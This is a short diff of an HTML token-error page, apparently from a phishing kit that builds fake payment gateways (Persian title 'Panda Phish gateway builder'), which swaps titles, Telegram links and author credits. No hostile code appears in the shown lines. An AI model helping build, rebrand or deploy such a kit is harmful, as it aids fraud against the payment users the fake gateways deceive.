--- a/token.html
+++ b/token.html
@@ -10,7 +10,7 @@
 	        <!----- CREATED BY <|X_KILER|> ----->
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>درگاه ساز فاکینگ</title>
+    <title>درگاه ساز پاندا فیش</title>
     <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
     <link rel="stylesheet" type="text/css" href="css/fontawesome-all.min.css">
     <link rel="stylesheet" type="text/css" href="css/iofrm-style.css">
@@ -35,13 +35,13 @@
             <div class="form-holder">
                 <div class="form-content">
                     <div class="form-items">
-                        <h3>درگاه ساز فاکینگ</h3>
+                        <h3>درگاه ساز پاندافیش</h3>
                         <p>توکن  شما اشتباه است </p><p>
                         
                         </p>
                         <div class="other-links">
 
-                    <a href="https://t.me/fuckingdargah"><font color="#00ffff">CODED BY DRWEX </font></a>
+                    <a href="https://t.me/SunPhish"><font color="#00ffff">CODED BY Mr BooM </font></a>
 
     </div>
                         
